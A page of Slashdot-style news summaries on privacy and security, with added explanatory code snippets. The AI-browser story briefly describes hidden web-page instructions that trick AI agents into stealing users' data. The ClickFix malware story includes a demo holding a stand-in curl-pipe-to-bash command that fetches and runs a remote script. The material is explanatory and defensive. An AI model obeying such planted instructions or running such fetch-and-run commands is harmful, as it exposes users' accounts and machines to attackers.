Privacy

Manufacturer Remotely Bricks Smart Vacuum After Its Owner Blocked It From Collecting Data (tomshardware.com) 123

"An engineer got curious about how his iLife A11 smart vacuum worked and monitored the network traffic coming from the device," writes Tom's Hardware.

"That's when he noticed it was constantly sending logs and telemetry data to the manufacturer — something he hadn't consented to." The user, Harishankar, decided to block the telemetry servers' IP addresses on his network, while keeping the firmware and OTA servers open. While his smart gadget worked for a while, it just refused to turn on soon after... He sent it to the service center multiple times, wherein the technicians would turn it on and see nothing wrong with the vacuum. When they returned it to him, it would work for a few days and then fail to boot again... [H]e decided to disassemble the thing to determine what killed it and to see if he could get it working again...

[He discovered] a GD32F103 microcontroller to manage its plethora of sensors, including Lidar, gyroscopes, and encoders. He created PCB connectors and wrote Python scripts to control them with a computer, presumably to test each piece individually and identify what went wrong. From there, he built a Raspberry Pi joystick to manually drive the vacuum, proving that there was nothing wrong with the hardware. From this, he looked at its software and operating system, and that's where he discovered the dark truth: his smart vacuum was a security nightmare and a black hole for his personal data.

First of all, its Android Debug Bridge, which gives full root access to the vacuum, wasn't protected by any kind of password or encryption. The manufacturer added a makeshift security measure by omitting a crucial file, which caused ADB to disconnect soon after booting, but Harishankar easily bypassed it. He then discovered that it used Google Cartographer to build a live 3D map of his home. This isn't unusual in itself. After all, it's a smart vacuum, and it needs that data to navigate around his home. However, the concerning thing is that it was sending all of this data to the manufacturer's servers. It makes sense for the device to send this data to the manufacturer, as its onboard SoC is nowhere near powerful enough to process all of it. However, it seems that iLife did not clear this with its customers.

Furthermore, the engineer made one disturbing discovery — deep in the logs of his non-functioning smart vacuum, he found a command with a timestamp that matched exactly the time the gadget stopped working. This was clearly a kill command, and after he reversed it and rebooted the appliance, it roared back to life.
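Matching a log entry against a failure time is a simple but effective forensic trick. A sketch of the idea with hypothetical log lines (the real log format on the vacuum's Android-based OS is not described in the article):

```python
from datetime import datetime

# Hypothetical log lines; only the timestamp-matching technique is the point.
LOG = [
    "2024-03-02 09:14:55 INFO  ota: heartbeat ok",
    "2024-03-02 09:15:03 CMD   remote: <opaque payload>",
    "2024-03-02 09:15:04 ERROR boot: service halted",
]

def commands_near(failure: datetime, window_s: int = 60) -> list[str]:
    """Return remote commands logged within window_s seconds of the failure."""
    hits = []
    for line in LOG:
        stamp = datetime.strptime(line[:19], "%Y-%m-%d %H:%M:%S")
        if "CMD" in line and abs((stamp - failure).total_seconds()) <= window_s:
            hits.append(line)
    return hits
```

A remote command logged seconds before the device stopped booting is exactly the kind of correlation that pointed him at the kill command.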

Thanks to long-time Slashdot reader registrations_suck for sharing the article.
AI

Do AI Browsers Exist For You - or To Give AI Companies Data? (fastcompany.com) 39

"It's been hard for me to understand why Atlas exists," writes MIT Technology Review. "Who is this browser for, exactly? Who is its customer? And the answer I have come to there is that Atlas is for OpenAI. The real customer, the true end user of Atlas, is not the person browsing websites, it is the company collecting data about what and how that person is browsing."

New York Magazine's "Intelligencer" column argues OpenAI wants ChatGPT in your browser because "That's where people who use computers, particularly for work, spend all their time, and through which vast quantities of valuable information flow in and out. Also, if you're a company hoping to train your models to replicate a bunch of white-collar work, millions of browser sessions would be a pretty valuable source of data."

Unfortunately, warns Fast Company, ChatGPT Atlas, Perplexity Comet, and other AI browsers "include some major security, privacy, and usability trade-offs... Most of the time, I don't want to use them and am wary of doing so..." Worst of all, these browsers are security minefields. A web page that looks benign to humans can include hidden instructions for AI agents, tricking them into stealing info from other sites... "If you're signed into sensitive accounts like your bank or your email provider in your browser, simply summarizing a Reddit post could result in an attacker being able to steal money or your private data," Brave's security researchers wrote last week. No one has figured out how to solve this problem.

If you can look past the security nightmares, the actual browsing features are substandard. Neither ChatGPT Atlas nor Perplexity Comet support vertical tabs — a must-have feature for me — and they have no tab search tool or way to look up recently-closed pages. Atlas also doesn't support saving sites as web apps, selecting multiple tabs (for instance, to close all at once with Cmd+W), or customizing the appearance. Compared to all the fancy new AI features, the web browsing part can feel like an afterthought. Regular web search can also be a hassle, even though you'll probably need it sometimes. When I typed "Sichuan Chili" into ChatGPT Atlas, it produced a lengthy description of the Chinese peppers, not the nearby restaurant whose website and number I was looking for.... Meanwhile, the standard AI annoyances still apply in the browser. Getting Perplexity to fill my grocery cart felt like a triumph, but on other occasions the AI has run into inexplicable walls and only ended up wasting more time.

There may be other costs to using these browsers as well. AI still has usage limits, and so all this eventually becomes a ploy to bump more people into paid tiers. Beyond that, Atlas is constantly analyzing the pages you visit to build a "memory" of who you are and what you're into. Do not be surprised if this translates to deeply targeted ads as OpenAI starts looking at ways to monetize free users. For now, I'm only using AI browsers in small doses when I think they can solve a specific problem.

Even then, I'm not going to sign them into my email, bank accounts, or any other accounts for which a security breach would be catastrophic. It's too bad, because email and calendars are areas where AI agents could be truly useful, but the security risks are too great (and well-documented).

The article notes that in August Vivaldi announced that "We're taking a stand, choosing humans over hype" with their browser: We will not use an LLM to add a chatbot, a summarization solution or a suggestion engine to fill up forms for you, until more rigorous ways to do those things are available. Vivaldi is the haven for people who still want to explore. We will continue building a browser for curious minds, power users, researchers, and anyone who values autonomy. If AI contributes to that goal without stealing intellectual property, compromising privacy or the open web, we will use it. If it turns people into passive consumers, we will not...

We're fighting for a better web.

Privacy

Woman Wrongfully Accused by a License Plate-Reading Camera - Then Exonerated By Camera-Equipped Car (electrek.co) 174

CBS News investigates what happened when police thought they'd tracked down a "porch pirate" who'd stolen a package — and accused an innocent woman.

"You know why I'm here," the police sergeant tells Chrisanna Elser. "You know we have cameras in that town..." "It went right into, 'we have video of you stealing a package,'" Elser said... "Can I see the video?" Elser asked. "If you go to court, you can," the officer replied. "If you're going to deny it, I'm not going to extend you any courtesy...." [You can watch a video of the entire confrontation.] On her doorstep, the officer issued a summons, without ever looking at the surveillance video Elser had. "We can show you exactly where we were," she told him. "I already know where you were," he replied.

Her Rivian — equipped with multiple cameras — had recorded her entire route that day... It took weeks of her collecting her own evidence, building timelines, and submitting videos before someone listened. Finally, she received an email from the Columbine Valley police chief acknowledging her efforts, saying "nicely done btw (by the way)," and informing her the summons would not be filed.

Elser also found the theft video (which the police officer refused to show her) on Nextdoor, reports Electrek. "The woman has the same color hair, but different facial and nose shape and apparent age than Elser, which is all reasonably apparent when viewing the video..."

But Elser does drive a green Rivian truck, which police knew had entered the neighborhood 20 times over the course of a month. (Though in the video the officer is told that a male driver in the same household passes through that neighborhood driving to and from work.) The problem may be their certainty — derived from Flock's network of cameras that automatically read license plates, "tracking movements of vehicles wherever they go..." The system has provoked concern from privacy- and freedom-focused organizations like the Electronic Frontier Foundation and American Civil Liberties Union. Flock also recently announced a partnership with Ring, seeking to use a network of doorbell cameras to track Americans in even more places.... [The police] didn't even have video of the truck in the area — merely tags of it entering... (it also left the area minutes later, indicating a drive-through rather than crawling through neighborhoods looking for packages — but police neglected to check the exit timestamps)... Elser has asked for an apology for [officer] Milliman's aggressive behavior during the encounter, but has heard nothing back from the department despite a call, email, and physical appearance at the police station.
The article points out that Rivian's "Road Cam" feature can be set to record footage of everything happening around it using the car's built-in driver-assist cameras. But if you want to record footage all the time, you'll need to plug in a USB-C external drive to store it. (It's ironic how different cameras recorded every part of this story — the theft, the police officer accusing the innocent woman, and that innocent woman's actual whereabouts.)

Electrek's take? "Citizens should not need to own a $70k+ truck, or even a $100 external hard drive, to keep track of everything they do in order to prove to power-tripping officers that they didn't commit a crime."
EU

Austria's Ministry of Economy Has Migrated To a Nextcloud Platform In Shift Away From US Tech (zdnet.com) 10

An anonymous reader quotes a report from ZDNet: Even before Azure had a global failure this week, Austria's Ministry of Economy had taken a decisive step toward digital sovereignty. The Ministry achieved this status by migrating 1,200 employees to a Nextcloud-based cloud and collaboration platform hosted on Austrian infrastructure. This shift away from proprietary, foreign-owned cloud services, such as Microsoft 365, to an open-source, European-based cloud service aligns with a growing trend among European governments and agencies. They want control over sensitive data and to declare their independence from US-based tech providers.

European companies are encouraging this trend. Many of them have joined forces in the newly created non-profit foundation, the EuroStack Initiative. This foundation's goal is "to organize action, not just talk, around the pillars of the initiative: Buy European, Sell European, Fund European." What's the motive behind these moves away from proprietary tech? Well, in Austria's case, Florian Zinnagl, CISO of the Ministry of Economy, Energy, and Tourism (BMWET), explained, "We carry responsibility for a large amount of sensitive data -- from employees, companies, and citizens. As a public institution, we take this responsibility very seriously. That's why we view it critically to rely on cloud solutions from non-European corporations for processing this information."

Austria's move and motivation echo similar efforts in Germany, Denmark, and other EU states and agencies. The organizations include the German state of Schleswig-Holstein, which abandoned Exchange and Outlook for open-source programs. Other agencies that have taken the same path away from Microsoft include the Austrian military, Danish government organizations, and the French city of Lyon. All of these organizations aim to keep data storage and processing within national or European borders to enhance security, comply with privacy laws such as the EU's General Data Protection Regulation (GDPR), and mitigate risks from potential commercial and foreign government surveillance.

Privacy

Denmark Reportedly Withdraws 'Chat Control' Proposal Following Controversy (therecord.media) 28

An anonymous reader quotes a report from The Record: Denmark's justice minister on Thursday said he will no longer push for an EU law requiring the mandatory scanning of electronic messages, including on end-to-end encrypted platforms. Earlier in its European Council presidency, Denmark had brought back a draft law which would have required the scanning, sparking an intense backlash. Known as Chat Control, the measure was intended to crack down on the trafficking of child sex abuse materials (CSAM). After days of silence, the German government on October 8 announced it would not support the proposal, tanking the Danish effort.

Danish Justice Minister Peter Hummelgaard told reporters on Thursday that his office will support voluntary CSAM detections. "This will mean that the search warrant will not be part of the EU presidency's new compromise proposal, and that it will continue to be voluntary for the tech giants to search for child sexual abuse material," Hummelgaard said, according to local news reports. The current model allowing for voluntary scanning expires in April, Hummelgaard said. "Right now we are in a situation where we risk completely losing a central tool in the fight against sexual abuse of children," he said. "That's why we have to act no matter what. We owe it to all the children who are subjected to monstrous abuse."

United States

You Can't Refuse To Be Scanned by ICE's Facial Recognition App, DHS Document Says (404media.co) 202

An anonymous reader shares a report: Immigration and Customs Enforcement (ICE) does not let people decline to be scanned by its new facial recognition app, which the agency uses to verify a person's identity and their immigration status, according to an internal Department of Homeland Security (DHS) document obtained by 404 Media. The document also says any face photos taken by the app, called Mobile Fortify, will be stored for 15 years, including those of U.S. citizens.

The document provides new details about the technology behind Mobile Fortify, how the data it collects is processed and stored, and DHS's rationale for using it. On Wednesday 404 Media reported that both ICE and Customs and Border Protection (CBP) are scanning people's faces in the streets to verify citizenship.

"ICE does not provide the opportunity for individuals to decline or consent to the collection and use of biometric data/photograph collection," the document, called a Privacy Threshold Analysis (PTA), says. A PTA is a document that DHS creates in the process of deploying new technology or updating existing capabilities. It is supposed to be used by DHS's internal privacy offices to determine and describe the privacy risks of a certain piece of tech. "CBP and ICE Privacy are jointly submitting this new mobile app PTA for the ICE Mobile Fortify Mobile App (Mobile Fortify app), a mobile application developed by CBP and made accessible to ICE agents and officers operating in the field," the document, dated February, reads. 404 Media obtained the document (which you can see here) via a Freedom of Information Act (FOIA) request with CBP.

Cellphones

Someone Snuck Into a Cellebrite Microsoft Teams Call and Leaked Phone Unlocking Details (404media.co) 56

An anonymous reader quotes a report from 404 Media: Someone recently managed to get on a Microsoft Teams call with representatives from phone hacking company Cellebrite, and then leaked a screenshot of the company's capabilities against many Google Pixel phones, according to a forum post about the leak and 404 Media's review of the material. The leak follows others obtained and verified by 404 Media over the last 18 months. Those leaks impacted both Cellebrite and its competitor Grayshift, now owned by Magnet Forensics. Both companies constantly hunt for techniques to unlock phones law enforcement have physical access to.

"You can Teams meeting with them. They tell everything. Still cannot extract esim on Pixel. Ask anything," a user called rogueFed wrote on the GrapheneOS forum on Wednesday, speaking about what they learned about Cellebrite capabilities. GrapheneOS is a security- and privacy-focused Android-based operating system. rogueFed then posted two screenshots of the Microsoft Teams call. The first was a Cellebrite Support Matrix, which lays out whether the company's tech can, or can't, unlock certain phones and under what conditions. The second screenshot was of a Cellebrite employee. According to another of rogueFed's posts, the meeting took place in October. The meeting appears to have been a sales call. The employee is a "pre sales expert," according to a profile available online.

The Support Matrix is focused on modern Google Pixel devices, including the Pixel 9 series. The screenshot does not include details on the Pixel 10, which is Google's latest device. It discusses Cellebrite's capabilities regarding 'before first unlock', or BFU, when a piece of phone unlocking tech tries to open a device before someone has typed in the phone's passcode for the first time since being turned on. It also shows Cellebrite's capabilities against after first unlock, or AFU, devices. The Support Matrix also shows Cellebrite's capabilities against Pixel devices running GrapheneOS, with some differences between phones running that operating system and stock Android. Cellebrite does support, for example, Pixel 9 devices BFU. Meanwhile the screenshot indicates Cellebrite cannot unlock Pixel 9 devices running GrapheneOS BFU. In their forum post, rogueFed wrote that the "meeting focused specific on GrapheneOS bypass capability." They added "very fresh info more coming."

Privacy

Mother Describes the Dark Side of Apple's Family Sharing (wired.com) 140

An anonymous reader quotes a report from 9to5Mac: A mother with court-ordered custody of her children has described how Apple's Family Sharing feature can be weaponized by a former partner. Apple support staff were unable to assist her when she reported her former partner using the service in controlling and coercive ways... Namely, Family Sharing gives all the control to one parent, not to both equally. The parent not identified as the organizer is unable to withdraw their children from this control, even when they have a court order granting them custody. As one woman's story shows, this allows the feature to be weaponized by an abusive former partner.

Wired reports: "The lack of dual-organizer roles, leaving other parents effectively as subordinate admins with more limited power, can prove limiting and frustrating in blended and shared households. And in darker scenarios, a single-organizer setup isn't merely inconvenient -- it can be dangerous. Kate (name changed to protect her privacy and safety) knows this firsthand. When her marriage collapsed, she says, her now ex-husband, the designated organizer, essentially weaponized Family Sharing. He tracked their children's locations, counted their screen minutes and demanded they account for them, and imposed draconian limits during Kate's custody days while lifting them on his own [...] After they separated, Kate's ex refused to disband the family group. But without his consent, the children couldn't be transferred to a new one. "I wrongly assumed being the custodial parent with a court order meant I'd be able to have Apple move my children to a new family group, with me as the organizer," says Kate. But Apple couldn't help. Support staff sympathized but said their hands were tied because the organizer holds the power."
Although users can "abandon the accounts and start again with new Apple IDs," the report notes that doing so means losing all purchased apps, along with potentially years' worth of photos and videos.
Firefox

Firefox Plans Smarter, Privacy-First Search Suggestions In Your Address Bar (nerds.xyz) 26

BrianFagioli shares a report from NERDS.xyz: Mozilla is testing a new Firefox feature that delivers direct results inside the address bar instead of forcing users through a search results page. The company says the feature will use a privacy framework called Oblivious HTTP, encrypting queries so that no single party can see both what you type and who you are. Some results could be sponsored, but Mozilla insists neither it nor advertisers will know user identities. The system is starting in the U.S. and may expand later if performance and privacy benchmarks are met. Further reading: Mozilla to Require Data-Collection Disclosure in All New Firefox Extensions
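Oblivious HTTP (standardized as RFC 9458) achieves the "no single party sees both" property by splitting the request between a relay and a gateway. A purely conceptual sketch of that split (toy "encryption" only, not a real implementation):

```python
# Conceptual sketch of the Oblivious HTTP split (RFC 9458):
# the relay learns the client's identity but only sees ciphertext;
# the gateway decrypts the query but only ever sees the relay's address.

def client(query: str, encrypt) -> tuple[str, bytes]:
    return "client-ip:203.0.113.7", encrypt(query)

def relay(client_ip: str, ciphertext: bytes) -> tuple[str, bytes]:
    # The relay forwards the opaque payload and strips the client's identity.
    return "relay-ip:198.51.100.1", ciphertext

def gateway(source: str, ciphertext: bytes, decrypt) -> tuple[str, str]:
    # The gateway recovers the query, but the only "who" it sees is the relay.
    return source, decrypt(ciphertext)

# End to end: the gateway learns the query but attributes it to the relay.
ip, ct = client("sichuan chili", encrypt=str.encode)
hop, ct = relay(ip, ct)
who, what = gateway(hop, ct, decrypt=bytes.decode)
```

In the real protocol the payload is encrypted with HPKE to the gateway's public key, so the relay genuinely cannot read it; the toy `encrypt`/`decrypt` above only stands in for that step.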
Security

Ransomware Profits Drop As Victims Stop Paying Hackers (bleepingcomputer.com) 16

An anonymous reader quotes a report from BleepingComputer: The number of victims paying ransomware threat actors has reached a new low, with just 23% of the breached companies giving in to attackers' demands. With some exceptions, the decline in payment resolution rates continues the trend that Coveware has observed for the past six years. In the first quarter of 2024, the payment percentage was 28%. Although it increased briefly over the next period, it then continued to drop, reaching an all-time low in the third quarter of 2025.

One explanation for this is that organizations implemented stronger and more targeted protections against ransomware, and authorities increased pressure on victims not to pay the hackers. [...] Over the years, ransomware groups moved from pure encryption attacks to double extortion that came with data theft and the threat of a public leak. Coveware reports that more than 76% of the attacks it observed in Q3 2025 involved data exfiltration, which is now the primary objective for most ransomware groups. The company says that when it isolates the attacks that do not encrypt the data and only steal it, the payment rate plummets to 19%, which is also a record for that sub-category.

The average and median ransomware payments fell in Q3 compared to the previous quarter, reaching $377,000 and $140,000, respectively, according to Coveware. The shift may reflect large enterprises revising their ransom payment policies and recognizing that those funds are better spent on strengthening defenses against future attacks. The researchers also note that threat groups like Akira and Qilin, which accounted for 44% of all recorded attacks in Q3 2025, have switched focus to medium-sized firms that are currently more likely to pay a ransom.
"Cyber defenders, law enforcement, and legal specialists should view this as validation of collective progress," Coveware says. "The work that gets put in to prevent attacks, minimize the impact of attacks, and successfully navigate a cyber extortion -- each avoided payment constricts cyber attackers of oxygen."
Mozilla

Mozilla to Require Data-Collection Disclosure in All New Firefox Extensions (linuxiac.com) 18

"Mozilla is introducing a new privacy framework for Firefox extensions that will require developers to disclose whether their add-ons collect or transmit user data..." reports the blog Linuxiac: The policy takes effect on November 3, 2025, and applies to all new Firefox extensions submitted to addons.mozilla.org. According to Mozilla's announcement, extension developers must now include a new key in their manifest.json files. This key specifies whether an extension gathers any personal data. Even extensions that collect nothing must explicitly state "none" in this field to confirm that no data is being collected or shared.
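Based on Mozilla's announced `data_collection_permissions` manifest key, a declaration for an extension that collects nothing might look like the following (a sketch; the exact shape should be checked against Mozilla's current add-on documentation):

```json
{
  "manifest_version": 3,
  "name": "Example Extension",
  "version": "1.0",
  "browser_specific_settings": {
    "gecko": {
      "id": "example@example.org",
      "data_collection_permissions": {
        "required": ["none"]
      }
    }
  }
}
```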

This information will be visible to users at multiple points: during the installation prompt, on the extension's listing page on addons.mozilla.org, and in the Permissions and Data section of Firefox's about:addons page. In practice, this means users will be able to see at a glance whether a new extension collects any data before they install it.

Programming

Does Generative AI Threaten the Open Source Ecosystem? (zdnet.com) 47

"Snippets of proprietary or copyleft reciprocal code can enter AI-generated outputs, contaminating codebases with material that developers can't realistically audit or license properly."

That's the warning from Sean O'Brien, who founded the Yale Privacy Lab at Yale Law School. ZDNet reports: Open software has always counted on its code being regularly replenished. As part of the process of using it, users modify it to improve it. They add features and help to guarantee usability across generations of technology. At the same time, users improve security and patch holes that might put everyone at risk. But O'Brien says, "When generative AI systems ingest thousands of FOSS projects and regurgitate fragments without any provenance, the cycle of reciprocity collapses. The generated snippet appears originless, stripped of its license, author, and context." This means the developer downstream can't meaningfully comply with reciprocal licensing terms because the output cuts the human link between coder and code. Even if an engineer suspects that a block of AI-generated code originated under an open source license, there's no feasible way to identify the source project. The training data has been abstracted into billions of statistical weights, the legal equivalent of a black hole.

The result is what O'Brien calls "license amnesia." He says, "Code floats free of its social contract and developers can't give back because they don't know where to send their contributions...."

"Once AI training sets subsume the collective work of decades of open collaboration, the global commons idea, substantiated into repos and code all over the world, risks becoming a nonrenewable resource, mined and never replenished," says O'Brien. "The damage isn't limited to legal uncertainty. If FOSS projects can't rely upon the energy and labor of contributors to help them fix and improve their code, let alone patch security issues, fundamentally important components of the software the world relies upon are at risk."

O'Brien says, "The commons was never just about free code. It was about freedom to build together." That freedom, and the critical infrastructure that underlies almost all of modern society, is at risk because attribution, ownership, and reciprocity are blurred when AIs siphon up everything on the Internet and launder it (the analogy of money laundering is apt), so that all that code's provenance is obscured.

AI

'Meet The People Who Dare to Say No to AI' (msn.com) 112

Thursday the Washington Post profiled "the people who dare to say no to AI," including a 16-year-old high school student in Virginia who says she doesn't want to off-load her thinking to a machine and worries about the bias and inaccuracies AI tools can produce...

"As the tech industry and corporate America go all in on artificial intelligence, some people are holding back." Some tech workers told The Washington Post they try to use AI chatbots as little as possible during the workday, citing concerns about data privacy, accuracy and keeping their skills sharp. Other people are staging smaller acts of resistance, by opting out of automated transcription tools at medical appointments, turning off Google's chatbot-style search results or disabling AI features on their iPhones. For some creatives and small businesses, shunning AI has become a business strategy. Graphic designers are placing "not by AI" badges on their works to show they're human-made, while some small businesses have pledged not to use AI chatbots or image generators...

Those trying to avoid AI share a suspicion of the technology with a wide swath of Americans. According to a June survey by the Pew Research Center, 50% of U.S. adults are more concerned than excited about the increased use of AI in everyday life, up from 37% in 2021.

The Post includes several examples, including a 36-year-old software engineer in Chicago who uses DuckDuckGo partly because he can turn off its AI features more easily than Google — and disables AI on every app he uses. He was one of several tech workers who spoke anonymously partly out of fear that criticisms could hurt them at work. "It's become more stigmatized to say you don't use AI whatsoever in the workplace. You're outing yourself as potentially a Luddite."

But he says GitHub Copilot reviews all changes made to his employer's code — and recently produced one review that was completely wrong, requiring him to correct and document all its errors. "That actually created work for me and my co-workers. I'm no longer convinced it's saving us any time or making our code any better." And he also has to correct errors made by junior engineers who've been encouraged to use AI coding tools.

"Workers in several industries told The Post they were concerned that junior employees who leaned heavily on AI wouldn't master the skills required to do their jobs and become a more senior employee capable of training others."
Privacy

US Expands Facial Recognition at Borders To Track Non-Citizens (reuters.com) 67

The U.S. will expand the use of facial recognition technology to track non-citizens entering and leaving the country in order to combat visa overstays and passport fraud, according to a government document published on Friday. Reuters: A new regulation will allow U.S. border authorities to require non-citizens to be photographed at airports, seaports, land crossings and any other point of departure, expanding on an earlier pilot program.

Under the regulation, set to take effect on December 26, U.S. authorities could require the submission of other biometrics, such as fingerprints or DNA, it said. It also allows border authorities to use facial recognition for children under age 14 and elderly people over age 79, groups that are currently exempted. The tighter border rules reflect a broader effort by U.S. President Donald Trump to crack down on illegal immigration. While the Republican president has surged resources to secure the U.S.-Mexico border, he has also taken steps to reduce the number of people overstaying their visas.

The Internet

Browser Promising Privacy Protection Contains Malware-Like Features, Routes Traffic Through China (arstechnica.com) 16

A web browser linked to Chinese online gambling websites and downloaded millions of times routes all internet traffic through servers in China and covertly installs programs that run in the background, according to findings published by network security company Infoblox. The researchers said the Universe Browser, which advertises itself as offering privacy protection, includes features similar to malware such as key logging and surreptitious connections.

Infoblox collaborated with the United Nations Office on Drugs and Crime on the research. The investigators found links between the browser and Southeast Asia's cybercrime ecosystem, which has connections to money laundering, illegal online gambling, human trafficking and scam operations using forced labor. The browser is directly linked to BBIN, a major online gambling company that has existed since 1999. Infoblox researchers examined the Windows version of the browser and found that it checks users' locations and languages when launched, installs two browser extensions, and disables security features including sandboxing.
Security

Fake Homebrew Google Ads Push Malware Onto macOS (bleepingcomputer.com) 20

joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...].

When checking some of the domains, BleepingComputer discovered that in some cases traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy and run a curl command in Terminal to install them, the researchers say. In other cases, such as TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.
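The base64 layer means the text a victim pastes into Terminal looks like noise rather than a command, which is part of the trick. Anything copied from a website can be decoded and inspected before it is executed. A minimal sketch of that check (the encoded string here is a harmless stand-in, not the campaign's actual payload):

```python
import base64

# Harmless stand-in for what a ClickFix page might place on the clipboard:
# a base64-encoded one-liner that pipes a remote script into a shell.
clipboard_payload = base64.b64encode(
    b"curl -fsSL https://example.invalid/install.sh | bash"
).decode()

# Decoding before running anything reveals the real command.
decoded = base64.b64decode(clipboard_payload).decode()
print(decoded)  # curl -fsSL https://example.invalid/install.sh | bash
```

Pasting an opaque blob like this into `base64 -d` (or the snippet above) instead of directly into a shell is enough to expose the install command the page was hiding.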

Classic Games (Games)

Chess Influencer and Grandmaster Daniel Naroditsky Dies At 29 (chess.com) 48

U.S. Grandmaster and beloved chess commentator Daniel Naroditsky has tragically passed away at the age of 29. "The news has sent shockwaves around the chess community, which is grieving the loss of one of the most beloved and influential voices," reports Chess.com. From the report: The devastating news was first shared by Naroditsky's club, Charlotte Chess Center, on Monday, and confirmed by Chess.com with multiple sources: "It is with great sadness that we share the unexpected passing of Daniel Naroditsky. Daniel was a talented chess player, educator, and cherished member of the chess community. He was also a loving son, brother, and loyal friend. We ask for privacy for Daniel's family during this extremely difficult time. Let us honor Daniel by remembering his passion for chess and the inspiration he brought to us all."

Naroditsky, who was three weeks away from turning 30, had long been known as one of the United States' most talented players. He achieved his grandmaster title at the age of 18 in 2013 and placed fifth among the highest-ranked juniors in 2015. His last FIDE rating was 2619, placing him among the top 150 in the world and 17th in the United States; his peak rating of 2647 came in 2017. He leaves a legacy that spans strong over-the-board competition and highly popular chess instruction and commentary on streaming platforms.

Wireless Networking

Kohler Unveils a Camera For Your Toilet (techcrunch.com) 97

Kohler has launched the Dekoda, a $599 smart toilet camera that analyzes users' waste to track hydration and gut health and to detect potential issues like blood. "It also comes with a rechargeable battery, a USB connection, and a fingerprint sensor to identify who's using the toilet," reports TechCrunch. From the report: The Dekoda is currently available for preorder, with shipments scheduled to begin on October 21. In addition to the hardware cost, customers will need to pay between $70 and $156 per year for a subscription. If you're uneasy about the privacy implications of putting a camera right below your private parts, the company says, "Dekoda's sensors see down into your toilet and nowhere else." It also notes that the resulting data is secured via end-to-end encryption.

Censorship

Big Tech Sues Texas, Says Age-Verification Law Is 'Broad Censorship Regime' (arstechnica.com) 49

An anonymous reader quotes a report from Ars Technica: Texas is being sued by a Big Tech lobby group over the state's new law that will require app stores to verify users' ages and impose restrictions on users under 18. "The Texas App Store Accountability Act imposes a broad censorship regime on the entire universe of mobile apps," the Computer & Communications Industry Association (CCIA) said yesterday in a lawsuit (PDF). "In a misguided attempt to protect minors, Texas has decided to require proof of age before anyone with a smartphone or tablet can download an app. Anyone under 18 must obtain parental consent for every app and in-app purchase they try to download -- from ebooks to email to entertainment."

The CCIA said in a press release that the law violates the First Amendment by imposing "a sweeping age-verification, parental consent, and compelled speech regime on both app stores and app developers." When app stores determine that a user is under 18, "the law prohibits them from downloading virtually all apps and software programs and from making any in-app purchases unless their parent consents and is given control over the minor's account," the CCIA said. "Minors who are unable to link their accounts with a parent's or guardian's, or who do not receive permission, would be prohibited from accessing app store content."

The law requires app developers "to 'age-rate' their content into several subcategories and explain their decision in detail," and "notify app stores in writing every time they improve or modify the functions, features, or user experience of their apps," the group said. The lawsuit says the age-rating system relies on a "vague and unworkable set of age categories." "Our Constitution forbids this," the lawsuit said. "None of our laws require businesses to 'card' people before they can enter bookstores and shopping malls. The First Amendment prohibits such oppressive laws as much in cyberspace as it does in the physical world." The lawsuit was filed in US District Court for the Western District of Texas. CCIA members include Apple and Google, which have both said the law would reduce privacy for app users. The companies recently described their plans to comply, saying they would take steps to minimize the privacy risks.

Windows

Microsoft Wants You To Talk To Your PC and Let AI Control It (theverge.com) 148

Microsoft is reshaping Windows around AI, introducing capabilities that let users control their computers through voice and allow Copilot to take autonomous actions on their behalf. The company is now rolling out a "Hey, Copilot!" wake word on Windows 11 machines, positioning voice as a "third input mechanism" to supplement the keyboard and mouse.

Copilot Vision, which streams what a user sees on their screen, is rolling out globally, enabling the system to troubleshoot PC problems, help with app usage, and provide task guidance. Microsoft is simultaneously testing Copilot Actions through a limited preview, allowing the AI to take autonomous actions on local machines like editing folders of photos. The company is also integrating Copilot into the Windows taskbar and launching advertisements promoting these features, coinciding with Windows 10's end-of-support earlier this week.

Yusuf Mehdi, Microsoft's consumer chief marketing officer, said the company wants users upgrading to Windows 11 to "experience what it means to have a PC that's not just a tool, but a true partner." Microsoft attempted to popularize Cortana, a voice assistant, on Windows 10 a decade ago. Last year, the company released Recall, a feature that automatically captured screenshots, drawing criticism over privacy.
